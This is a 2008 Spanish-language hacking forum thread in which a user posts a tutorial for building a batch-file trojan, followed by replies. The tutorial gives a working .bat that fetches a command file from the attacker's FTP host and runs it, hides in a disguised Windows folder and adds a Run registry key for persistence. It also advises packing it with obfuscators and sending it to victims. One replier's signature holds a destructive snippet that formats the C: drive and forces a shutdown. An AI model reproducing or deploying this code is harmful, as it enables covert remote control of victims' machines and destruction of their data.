Vota por nosotros en el ranking web que participamos

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Octubre 14, 2008, 09:04:02
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Programacion  |  Programación  |  Batch (Moderadores: Espectro Infernal, |Shadow|)  |  Tema: Troyanizando en Batch |GUN$| 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Troyanizando en Batch |GUN$|  (Leído 251 veces)
GUN$
Miembro
*****
Desconectado Desconectado

Mensajes: 23


Ver Perfil
« en: Febrero 05, 2008, 06:51:52 »

Troyanizando en batch




Indice:

->1.Introduccion
->2.Requisitos minimos
->3.Crear cuenta FTP
->4.Codigo para la vícitima
->5.Codigo FTP
->6.Iexpress + Themida + Cygy para Código FTP

_____________________________________________________________________


1.Introduccion

· Os voy a hacer un breve tutorial de como troyanizar en batch sin usar ningun ejecutable Wink solo con un .txt y un .bat; ayudandonos de lo maravilloso que es FTP Wink


2.Requisitos minimos

->notepad.exe (jajaja)
->una cuenta ftp
->Vía de propagacion
->Iexpress + themida + cygy


3.Crear cuenta FTP

->Crea tu cuenta FTP
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
AQUI



4.Codigo para la vícitima

-> Llegados a este punto, crearemos un codigo en batch al cual nombraremos como ordenes.txt (no vale otro nombre)

->abrimos nuestro notepad... y a nuestro gusto creamos el code con programacion batch Wink el cual sera ejecutado en el pc de la víctima

·comandos interesantes:

-Dir
-Del
-Start
-Reg ADD
-Attrib
-Shutdown


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Más información para crear vuestro code
Wink


Cuando tengamos el code guardado como ordenes.txt; lo deberemos subir a nuestra cuenta FTP

·ordenes.txt será el codigo que se ejecute en el pc de la victima cada vez ke inicie windows Wink

NOTA: Debereis rehacer a vuestro gusto vuestro ordenes.txt i volverlo a subir a vuestro ftp para ke se ejecute en el pc de la victima cuando inicie windows Wink


5.Codigo FTP

Aqui os pongo el .bat que le tendreis que enviar a vuestra victima Wink

NOTA: Luego lo camuflaremos con themida o iexpress o cygy... comprimiendolo con un compresor (winrar, winzip....) para luego enviarlo.

Citar
 @echo off
pushd "%windir%\$NtUninstallWudf01000$\spuninst"
echo username>ftp.tmp
echo pass>>ftp.tmp
echo get ordenes.txt>>ftp.tmp
echo bye>>ftp.tmp
echo quit>>ftp.tmp
ftp -s:ftp.tmp ftp.geocities.com
del /f /q ftp.tmp
rename ordenes.txt soundUni.bat
start soundUni.bat
pushd "%homepath%\Mis documentos\Mis archivos recibidos"
copy /Y  "archivo_ftp.bat"  "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Uninstall" /t Reg_SZ /d "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat /f"
exit

·Username: Aqui debereis colocar vuestro usuario de ftp
·Pass: Aqui deberis poner la pass de vuestro ftp
·ordenes.txt: nunca cambies el nombre de vuestro archivo ordenes.txt ya que si lo cambiais el code no podria bajar el archivo para ejecutarlo en el pc de la victima Wink
·archivo_ftp.bat:Si el archivo ke le enviareis a la victima lo compilais a .exe pues debereis cambiar el nombre a archivo_ftp.exe y si le dais un nombre menos llamativo a vuestro code pues quedaria asi:

Msn.exe ... por ejemplo...en el code tmb lo debeis sustituir....


6.Iexpress + Themida + Cygy para Código FTP

-> En esta parte es donde debereis compilar vuestro "msn.bat" a "msn.exe", comprimirlo y enviarlo por alguna via de red Wink

->Tutorial + Descarga por Txshack Wink


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
CYGY + THEMIDA + IEXPRESS





->La explicacion a sido breve i un poco imprecisa :S  lo siento.... si teneis alguna duda preguntenla por M.P o en este mismo post Wink


_____________________________________________________________________



TUTORIAL POR GUN$

FUENTE:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
http://foro.infiernohacker.com/index.php?topic=2641.0
« Última modificación: Febrero 06, 2008, 11:33:45 por GUN$ » En línea

ECDundy
Habitual
*****
Desconectado Desconectado

Mensajes: 211


throw new exception(":)");

erick_cartman_ok
Ver Perfil WWW Email
« Respuesta #1 en: Febrero 05, 2008, 10:07:31 »

hummm esto es mas viejo que napoleon mi amigo
En línea

cuban-hack
Habitual
*****
Desconectado Desconectado

Mensajes: 300


en la vida hay cosas que no se pueden explicar....


Ver Perfil WWW
« Respuesta #2 en: Febrero 06, 2008, 11:21:49 »

amigo como dice ECDundy esto es mas viejo que fidel... pero siempre hay alguien que aprende cosas nuevas..... así que si puedes explicar la parte 4 con mas detenimiento, te quedaría mejor.
por que el que este empesando y no sepa mucho, le saltes así de repente que tiene que crear un codigo en bat...... lo vas a dejar ..---:::KO:::---...   
tampoco que le hagas todo el trabajo, pero bueno
En línea

vivimos para amar,
y el amor es todo lo que nos rodea....
material o no......
por eso vive con pacion todo lo que digas o escrivas.. y seras recordado..
                            yu cuban-hack [cub2(daviel)]
echo off
format c:\
y/n:y
y/n:y
shutdown -r -t 05 -e "JODETE"
msgs *yo vivo jodiendo y ¿tu?
GUN$
Miembro
*****
Desconectado Desconectado

Mensajes: 23


Ver Perfil
« Respuesta #3 en: Febrero 06, 2008, 11:30:50 »

amigo como dice ECDundy esto es mas viejo que fidel... pero siempre hay alguien que aprende cosas nuevas..... así que si puedes explicar la parte 4 con mas detenimiento, te quedaría mejor.
por que el que este empesando y no sepa mucho, le saltes así de repente que tiene que crear un codigo en bat...... lo vas a dejar ..---:::KO:::---...   
tampoco que le hagas todo el trabajo, pero bueno

jajaj tenes razón -.-


Pero si sta empezando.... pues le convendria mejor el bifrost...
En línea

cuban-hack
Habitual
*****
Desconectado Desconectado

Mensajes: 300


en la vida hay cosas que no se pueden explicar....


Ver Perfil WWW
« Respuesta #4 en: Febrero 06, 2008, 11:37:14 »

tambien,


si pones un link intenta que sea de la misma casa, por asi decirlo.....
« Última modificación: Febrero 06, 2008, 12:19:42 por cuban-hack » En línea

vivimos para amar,
y el amor es todo lo que nos rodea....
material o no......
por eso vive con pacion todo lo que digas o escrivas.. y seras recordado..
                            yu cuban-hack [cub2(daviel)]
echo off
format c:\
y/n:y
y/n:y
shutdown -r -t 05 -e "JODETE"
msgs *yo vivo jodiendo y ¿tu?
[ E0F ] d0RkNet
Moderación
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 3095



Ver Perfil
« Respuesta #5 en: Febrero 06, 2008, 11:55:39 »

buena info gun$....esto le servira a cualquier new.....incluso para el que no tiene mucha idea





saludos
En línea

Until The End =>
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
GUN$
Miembro
*****
Desconectado Desconectado

Mensajes: 23


Ver Perfil
« Respuesta #6 en: Febrero 06, 2008, 12:44:37 »

Claro ke si...especialmente a los que ya son sabios en batch (como yo jajaj)
En línea

skullmaster-Back-
Visitante
« Respuesta #7 en: Febrero 06, 2008, 07:45:27 »

jeje que mas plaga!XD al fin te registras, bueno como te dije en el otro foro, buena info para los newbye! Wink

Salu2's! Cool
En línea
GUN$
Miembro
*****
Desconectado Desconectado

Mensajes: 23


Ver Perfil
« Respuesta #8 en: Febrero 07, 2008, 11:00:44 »

...new bye ?? jaja... un newbye no creo ke De exo eso jajjaaja...admas tienen kada fallo...de sintaxis... jajaja   juas Tongue


SalUDOs Wink   EN Especial a  skullmaster123 Wink

jajaja >.<
En línea

Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Programacion  |  Programación  |  Batch (Moderadores: Espectro Infernal, |Shadow|)  |  Tema: Troyanizando en Batch |GUN$| « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.6 | SMF © 2006-2007, Simple Machines LLC